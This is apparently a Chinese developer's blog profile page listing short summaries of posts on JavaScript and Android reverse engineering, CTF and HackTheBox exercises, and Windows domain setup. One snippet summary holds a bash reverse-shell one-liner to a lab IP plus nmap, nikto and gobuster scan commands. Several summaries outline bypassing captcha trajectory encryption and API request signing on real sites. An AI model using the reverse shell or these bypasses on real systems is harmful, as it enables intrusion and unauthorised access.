自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(31)
  • 收藏
  • 关注

原创 某易某盾js分析

时间:2025.03.19版本:其中通过python调用node对轨迹点进行加密的函数时,通过在url添加随机数动态加载js:使用浏览器override功能将加载处代码重写使用代理软件进行文件替换。

2025-03-19 17:54:44 976

原创 oklink js逆向(入口定位)

结合搜索结果,搜索关键字 apikey(,只找到5个。可见使用了字符串混淆,所以搜索不到 x-apikey。还可以通过搜索 headers,追踪调用栈的方式定位。分析api请求,定位参数 X-Apikey。搜索关键字apikey,发现结果太多。

2025-04-07 19:30:50 153

原创 丁香园-搜索功能

定位网络请求,分析请求参数,主要有 noncestr sign 要分析。noncestr 定义如下,生成长度为8的随机字符串。搜索罕见关键字 noncestr。AI分析可知知是SHA1哈希算法。sign 的计算如下。

2025-04-07 10:36:31 234

原创 医保服务平台 Webpack逆向

function o 是常见的webpack加载器格式,之后一大堆类似 o.e = xxx 的赋值语句。之后的 o(xxx) 函数大概率是检测环境的函数,注释后即可免去补环境。分析可知 u=n("7d92") 其中 u.a 为加密函数 u.b 为解密函数。SM4 为国密算法,其中e.data 为响应。发现数据被加密,搜索关键字。类似的,使用关键字搜索,定位请求加密处。在每个拦截器的尾部断点,确定解密位置。其中 loader.js,直接复制。扣代码,删除环境检测函数。

2025-03-27 17:19:28 447

原创 js逆向 常用 / Hook

2. 注释初始化动作,去除环境监测。3. 加载器函数提升到全局作用域。1. 找加载器对应文件。

2025-03-27 15:37:22 605

原创 猿人学js逆向 - 16

r.m = n[e(528)](btoa, p_s), 等价于直接将时间戳作为参数运行 btoa函数,btoa被重写不是base64加密。三个参数:page、token、时间戳,时间戳和page直接获得,token需要扣代码。其中 n.g 这个值需要赋值,浏览器代码中它是有值的,这里要手动赋值。补完环境扣完代码后运行总是出错,响应token错误。md5函数中也存在字符串混淆,且被重排序。

2025-03-26 18:11:31 196

原创 猿人学js逆向 - 19

上网搜索发现此题考点是环境监测,注释掉headers后依旧成功获取答案,怀疑是题目环境出现问题。没有复杂参数,直接复制curl转换python发送请求。但此题开启转包软件后服务端不会返回正常答案。

2025-03-26 11:24:59 712

原创 猿人学js逆向 - 15

分析请求,发现每个get请求带一个token。window.q 是一个wasm函数。使用 wasmer 库调用。函数名为encode。

2025-03-26 10:46:09 866

原创 猿人学js逆向 - 04

数据展示的原理,使用内容为数字的图片加偏移实现。

2025-03-26 10:11:32 176

原创 猿人学js逆向 - 03

之后发现必须使用 requests 的 Session 对象,并且在设置headers和Cookie时也要注意。将两个请求复制为curl格式,转为python后发送,得到一串html文本。第一个代码来自 jQuery 的 hook 函数。发现每次点击都是发送两个请求。反复请求无法发现之间的关系。将其注释后发现请求回失败。

2025-03-25 17:41:26 783

原创 猿人学js逆向 - 17

使用 httpx 发送 HTTP2.0 请求。题目提示了 http2.0。

2025-03-25 15:57:23 808

原创 猿人学js逆向 - 12

刷新网页,发现请求携带token。

2025-03-25 15:44:41 808

原创 猿人学js逆向 - 13

hook document.cookie 也无效。反复追栈、hook全部失败。

2025-03-25 15:42:21 803

原创 猿人学js逆向 - 01

使用 hook 定位 window.f,发现是 oo0O0 函数中的 eval() 函数中的VM中执行的。eval 执行的内容是将base64编码后的代码解码并替换其中的参数为时间变量 0x2268f9。打开f12遇到一个定时器无限debugger,使用条件断点去除。注意token中的分割符号不是普通空格,可直接复制编码后的值。分析发现token来自ajax方法的b参数。进入 VM 中,代码被混淆。

2025-03-19 22:32:26 232

原创 中标网js分析

搜索关键字 得知使用了DES算法

2025-03-16 19:29:18 178

原创 某道翻译接口js分析

每次翻译的请求如下,3个xhr为一组/webtranslate/key 的请求与响应/webtranslate 的请求与响应分析可知,主要的变化参数为 sing 和 时间戳mysticTime追踪栈请求发送处向上查找,发现sign在params参数中,向下追踪调用栈在栈中找到sign其中除时间戳外都为固定值。

2025-03-16 16:46:28 230

原创 HackTheBox - Chemistry

获得shell后查看相关信息。home目录下存在用于 rosa,切换到用户,查看flag。当前python网站的sqlite数据库中有数据。上传文件在线解析,可猜测到是文件解析漏洞。反弹shell的脚本。

2025-03-13 20:46:25 228

原创 猿人学 安卓逆向

猿人学2022安卓逆向比赛做题笔记

2025-03-12 16:10:11 604

原创 scrape_center APP

scrape.cente 网站中APP逆向分析与抓包

2025-03-11 15:02:01 552

原创 scrape_center appbasic

使用 jadx-gui 进行java层静态分析,IDA进行so层静态分析,jeb动态调试,frida注入。

2025-03-10 16:07:10 129

原创 安卓逆向这档事-52pojie

汉化:文本可能在代码中或xml文件中,可能的位置:Arsc、xml、dex文件。解压apk文件,从lib目录中提取so文件。frida-ps -U // 查看进程PID。使用MT管理器、NP管理器修改包名实现共存。一些加密方法,用于Xposed练习。确认报名和Activity名。使用 frida Hook。

2025-03-08 21:13:15 1365

原创 scrape.center login1

找入口查看调用栈将表单内容json序列化后使用base64编码得到 token。

2025-02-16 20:26:49 218

原创 渗透-常用片段

反弹 bash:bash -i >& /dev/tcp/192.168.56.109/444 0>&1nmap -sn 192.168.56.1/24nmap -p- -A -sV 192.168.56.xnikto -h http://xxgobuster dir --url 192.168.56.128 --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -x php,txt,html,js,php.bak,txt.bak,htm

2025-02-12 11:22:33 146

原创 scrape.center spa14 spa15 wasm

可找到入口wasm内容如下wasm代码类似汇编代码。

2025-02-12 11:21:49 200

原创 scrape.center spa7 spa8 spa9

可直接看到加密逻辑使用AI生成python代码,也可直接复制只用nodejs调用。

2025-02-11 10:46:54 203

原创 scrape.center spa6

列表页apiapi的url如下:https://spa6.scrape.center/api/movie/?其中 token base64解码得到:f4624250e650ff80769f37cdc5ef1c7dbea73532,1739153205 且此token存在时间限制详情页api:https://spa6.scrape.center/detail/ZWYzNCN0ZXVxMGJ0dWEjKC01N3cxcTVvNS0takA5OHh5Z2ltbHlmeHMqLSFpLTAtbWIx。

2025-02-11 09:59:21 729

原创 scrape.center spa10 spa11 spa12

JJEncode 混淆删去最后一个调用的括号,添加 toString 方法。

2025-02-11 09:58:52 120

原创 scrape.center spa2

其中token为js动态生成。通过网络请求查看网络请求js。点击进入token生成函数。其中d对象为xhr对象。发现token的构造。打断点,点击进入函数。

2025-01-25 10:22:47 233

原创 windows server 2003 - 组策略部署软件

通过组策略为域内用户部署(deploy)软件,可分为指派(assign)和发布(publish)。

2023-05-30 10:30:12 395 1

原创 windows2003-建立域

活动目录是一个包括文件、打印机、应用程序、服务器、域、用户账户等对象的数据库。常见概念:对象、属性、容器abc.com\业务部\业务一组\张三。

2023-05-27 21:34:19 614 1

原创 文章记录-常见漏洞

XXE。

2023-05-26 21:24:56 130 1

某易某盾js分析代码-2025.03.19版

某易某盾js分析代码-2025.03.19版

2025-03-19

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除